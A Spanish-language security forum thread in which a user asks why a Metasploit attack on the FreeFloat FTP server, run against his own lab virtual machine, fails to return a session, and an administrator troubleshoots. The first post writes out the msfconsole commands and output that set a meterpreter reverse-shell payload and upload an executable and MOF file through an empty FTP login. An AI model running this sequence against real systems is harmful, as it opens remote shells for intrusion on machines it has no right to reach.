comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Exploit FreeFloat

  • 7 Respuestas
  • 1608 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado RxB

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Octubre 10, 2015, 09:51:13 pm »
Hola Gente,

Tengo instalado en una máquina virtual con SO windows / el programa vulnerable FreeFloat.
Cuando lanzo el exploit desde metasploit realiza todos los procesos y no se logra la conexión. Alguien puede ayudarme?



msf > use exploit/windows/ftp/freefloatftp_wbem
msf exploit(freefloatftp_wbem) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(freefloatftp_wbem) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(freefloatftp_wbem) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf exploit(freefloatftp_wbem) > exploit
  • Exploit running as background job.
  • Started reverse handler on 192.168.1.102:4444

msf exploit(freefloatftp_wbem) >
  • Server started.
  • 192.168.1.106:21 - Trying to upload SxofqwKjdO.exe
  • 192.168.1.106:21 - Sending empty login...
  • 192.168.1.106:21 - Empty authentication was successful
  • 192.168.1.106:21 - Set binary mode
  • 192.168.1.106:21 - Set active mode "192,168,1,102,31,144"
  • 192.168.1.106:21 - Trying to upload pvzBH.mof
  • 192.168.1.106:21 - Sending empty login...
  • 192.168.1.106:21 - Empty authentication was successful
  • 192.168.1.106:21 - Set binary mode
  • 192.168.1.106:21 - Set active mode "192,168,1,102,31,144"


msf exploit(freefloatftp_wbem) >
« Última modificación: Octubre 10, 2015, 09:59:40 pm por Gabriela »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5400
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Octubre 23, 2015, 09:19:55 am »
Hola @No tienes permisos para ver links. Registrate o Entra con tu cuenta,

Sabes si hay un firewall en el medio? O si el puerto está efectivamente abierto?

Saludos!
ANTRAX


Desconectado RxB

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Octubre 23, 2015, 11:30:40 am »
El puerto está abierto con firewall desactivado.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5400
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Octubre 23, 2015, 11:39:56 am »
Comparaste la versión de FreeFloat con la del expoit?

Saludos!
ANTRAX


Desconectado RxB

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Octubre 23, 2015, 12:26:45 pm »
Si, la versión es exactamente la misma q aparece en los targets del exploit.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5400
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #5 en: Octubre 23, 2015, 02:38:49 pm »
Te aseguraste de que FreeFloat FTP Server este en el modo "Start"?
Es decir, para que este exploit funcione, necesita que el programa esté corriendo, y ahi se sube el  NFSIf.exe y kQfzssDlqDGZO.mof en el sistema del usuario, devolviendo una sesion meterpreter. si es que se logra una conexión exitosa

Saludos!
ANTRAX


Desconectado RxB

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Octubre 23, 2015, 02:55:30 pm »
Si, estaba en modo start corriendo en el puerto 21. Comienza a subir el archivo SxofqwKjdO.exe, se autentica en forma correcta y queda colgado. La prueba la realicé sobre una máquina virtual. Tal vez tenga q ver con algún error de config en la máquina virtual

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5400
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #7 en: Octubre 23, 2015, 03:08:23 pm »
Puede ser, no tienes otra pc para probarlo? asi vas descartando problemas. Por que los pasos que describiste que hiciste, estan todos bien.

Saludos!
ANTRAX


 

¿Te gustó el post? COMPARTILO!



Ayuda este exploit me sirve para elevar privilegios y tener permisos en ssh?

Iniciado por xavicibi

Respuestas: 8
Vistas: 2462
Último mensaje Noviembre 06, 2014, 03:48:27 pm
por Snifer
¿alguna manera efectiva de encontrar jmp o call en exploit para linux?

Iniciado por proxy_lainux

Respuestas: 0
Vistas: 281
Último mensaje Marzo 31, 2018, 11:32:40 pm
por proxy_lainux
[SOLUCIONADO] Error al runear exploit nuevo agregado manualmente METASPLOIT.

Iniciado por snyperip

Respuestas: 1
Vistas: 1098
Último mensaje Agosto 03, 2013, 01:13:08 am
por Stuxnet
Algún exploit kit funcional aunque este detectado por los antivirus?

Iniciado por xavicibi

Respuestas: 0
Vistas: 936
Último mensaje Febrero 19, 2015, 12:00:35 pm
por xavicibi
Necesito exploit root para Linux 2.6.32-320.4.1.lve1.1.4.el6.x86_64

Iniciado por Mr_Pack

Respuestas: 0
Vistas: 1559
Último mensaje Julio 21, 2012, 03:29:25 pm
por Mr_Pack